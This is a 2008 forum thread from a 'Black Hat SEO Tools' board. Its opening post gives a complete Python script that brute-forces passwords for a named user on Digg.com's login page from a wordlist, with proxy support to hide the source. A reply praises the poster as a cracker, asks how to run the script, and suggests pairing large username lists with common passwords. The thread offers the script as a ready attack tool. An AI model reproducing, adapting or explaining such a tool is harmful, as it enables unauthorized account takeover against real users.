1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Digg.com Login BruteForcer

Discussion in 'Black Hat SEO Tools' started by nme, Apr 5, 2008.

  1. nme

    nme Junior Member

    Joined:
    Jan 17, 2008
    Messages:
    124
    Likes Received:
    36
    Code:
    #!/usr/bin/python
    #Digg.com Login BruteForcer
    
    #http://www.darkc0de.com
    #d3hydr8[at]gmail[dot]com 
    
    import urllib2, sys, re, urllib, httplib, socket
    
    print "\n   d3hydr8[at]gmail[dot]com diggBF v1.0"
    print "----------------------------------------------"
    
    if len(sys.argv) not in [4,5,6]:
    	print "Usage: ./diggbf.py <user> <wordlist> <options>\n"
    	print "\t   -p/-proxy <host:port> : Add proxy support"
    	print "\t   -v/-verbose : Verbose Mode\n"
    	sys.exit(1)
    	
    for arg in sys.argv[1:]:
    	if arg.lower() == "-p" or arg.lower() == "-proxy":
    		proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
    	if arg.lower() == "-v" or arg.lower() == "-verbose":
    		verbose = 1
    		
    try:
    	if proxy:
    		print "\n[+] Testing Proxy..."
    		h2 = httplib.HTTPConnection(proxy)
    		h2.connect()
    		print "[+] Proxy:",proxy
    except(socket.timeout):
    	print "\n[-] Proxy Timed Out"
    	proxy = 0
    	pass
    except(NameError):
    	print "\n[-] Proxy Not Given"
    	proxy = 0
    	pass
    except:
    	print "\n[-] Proxy Failed"
    	proxy = 0
    	pass
    	
    try:
    	if verbose == 1:
    		print "[+] Verbose Mode On\n"
    except(NameError):
    	print "[-] Verbose Mode Off\n"
    	verbose = 0
    	pass
    	
    host = "http://digg.com/login"
    print "[+] BruteForcing:",host
    print "[+] User:",sys.argv[1]
    
    try:
      	words = open(sys.argv[2], "r").readlines()
      	print "[+] Words Loaded:",len(words),"\n"
    except(IOError): 
      	print "[-] Error: Check your wordlist path\n"
      	sys.exit(1)
      
    for word in words:
    	word = word.replace("\r","").replace("\n","")
    	login_form_seq = [
         	('username', sys.argv[1]),
         	('password', word),
         	('persistent', 'on'),
         	('submit', 'Login'),
    	('processlogin', '1'),
    	('returnpage', '/')]
    	login_form_data = urllib.urlencode(login_form_seq)
    	if proxy != 0:
    		proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
    		opener = urllib2.build_opener(host, proxy_handler)
    	else:
    		opener = urllib2.build_opener(host)
    	try:
    		site = opener.open(host, login_form_data).read()
    	except(urllib2.URLError), msg:
    		print msg
    		site = ""
    		pass
    
    	if re.search("<h3>Whoops!</h3>",site) == None:
    		print "\n\t[!] Login Successfull:",sys.argv[1],word,"\n"
    		sys.exit(1)
    	else:
    		if verbose == 1:
    			print "[-] Login Failed:",word
    print "\n[-] Brute Complete\n"
    
     
  2. HenryHavoc

    HenryHavoc Jr. VIP Jr. VIP

    Joined:
    Mar 24, 2008
    Messages:
    794
    Likes Received:
    1,532
    Occupation:
    Hustler
    Location:
    Cincinnati
    Could it really be? NME the famous cracker? If it is, pleasure to meet you! :eek: Huge fan.

    Thanks for the script. How to work it? I'm assuming you need username and password databases. With cracking, I've found that a huge username list with the most commonly used passwords works well. But anyways. Can you post a how-to? To lazy to figure it out myself. :D
     
  3. HenryHavoc

    HenryHavoc Jr. VIP Jr. VIP

    Joined:
    Mar 24, 2008
    Messages:
    794
    Likes Received:
    1,532
    Occupation:
    Hustler
    Location:
    Cincinnati
    EDIT: Nope, not a batch file.